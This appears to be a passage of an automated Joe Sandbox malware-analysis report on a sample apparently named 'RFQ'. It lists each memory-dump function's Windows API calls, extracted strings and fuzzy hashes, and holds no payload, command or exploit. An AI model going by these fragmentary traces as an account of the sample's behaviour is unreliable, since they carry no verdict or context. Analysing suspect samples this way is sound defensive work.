                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                          • String ID: %s%u
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InfoItemMenu$Sleep
                                                                          • String ID: 0
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                          • String ID: (
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 1976180769-4113822522
                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                          • String ID:
                                                                          • API String ID: 461458858-0
                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3969911579-0
                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                          • String ID: 0
                                                                          • API String ID: 956284711-4108050209
                                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 1965227024-3771769585
                                                                          • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                          • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove_wcslen
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 369157077-1007645807
                                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00445BF8
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 3125838495-3381328864
                                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                          APIs
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CharNext
                                                                          • String ID:
                                                                          • API String ID: 1350042424-0
                                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 3052893215-2127371420
                                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-2354261254
                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 3038501623-2263619337
                                                                          • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                          • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-8599901
                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                          • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                          • IsWindow.USER32(?), ref: 00443C3A
                                                                          • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1834419854-3405671355
                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 455036304-4153970271
                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
